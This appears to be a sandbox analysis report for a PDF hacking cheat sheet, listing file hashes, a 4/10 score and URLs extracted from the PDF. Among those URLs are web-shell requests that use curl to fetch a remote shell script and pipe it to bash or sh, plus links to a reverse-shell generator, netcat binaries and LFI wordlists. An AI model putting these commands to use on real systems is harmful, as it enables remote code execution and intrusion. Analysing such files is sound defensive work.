General

  • Target

    Hoja de trucos-3.pdf

  • Size

    1.1MB

  • MD5

    328b9627c9698d3dd24b4cc99601b6ab

  • SHA1

    0fff42794b188d54c33596d762a61846f31d35c9

  • SHA256

    01789cc6c0331ba663d6811ad3ddff9db4bf7df9658749a932453959e629cc09

  • SHA512

    b847b1cf1c4790138baea0d8d3f8904127dff78b1cacd703e31a8b51b425ee001d0e8fa17904d247ecbf91896fd2d898223f7cd8103904b40449c63e7f0482a2

  • SSDEEP

    24576:kvNZr8nMI1Ma5ESf42MXd0Wsq8Q4jjw6bKjh0NviCH:dMKRfVM2WsqHMbKt0cA

Score
4/10

Malware Config

Signatures

  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • One or more HTTP URLs in PDF identified

    Detects presence of HTTP links in PDF files.

Files

  • Hoja de trucos-3.pdf
    .pdf
    • https://github.com/Anonimo501/LFI_diccionarios

    • https://github.com/Anonimo501/Auto_Wordlists_LFI

    • http://unika.htb/index.php?page=//10.10.14.134/algoquenoexista

    • http://example.com/

    • http://example.com/shell.php?cmd=whoami

    • https://www.revshells.com/

    • http://example.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash

    • http://example.htb/shell.php?cmd=curl%2010.10.14.134:8000/shell.sh|sh

    • https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------

    • Show all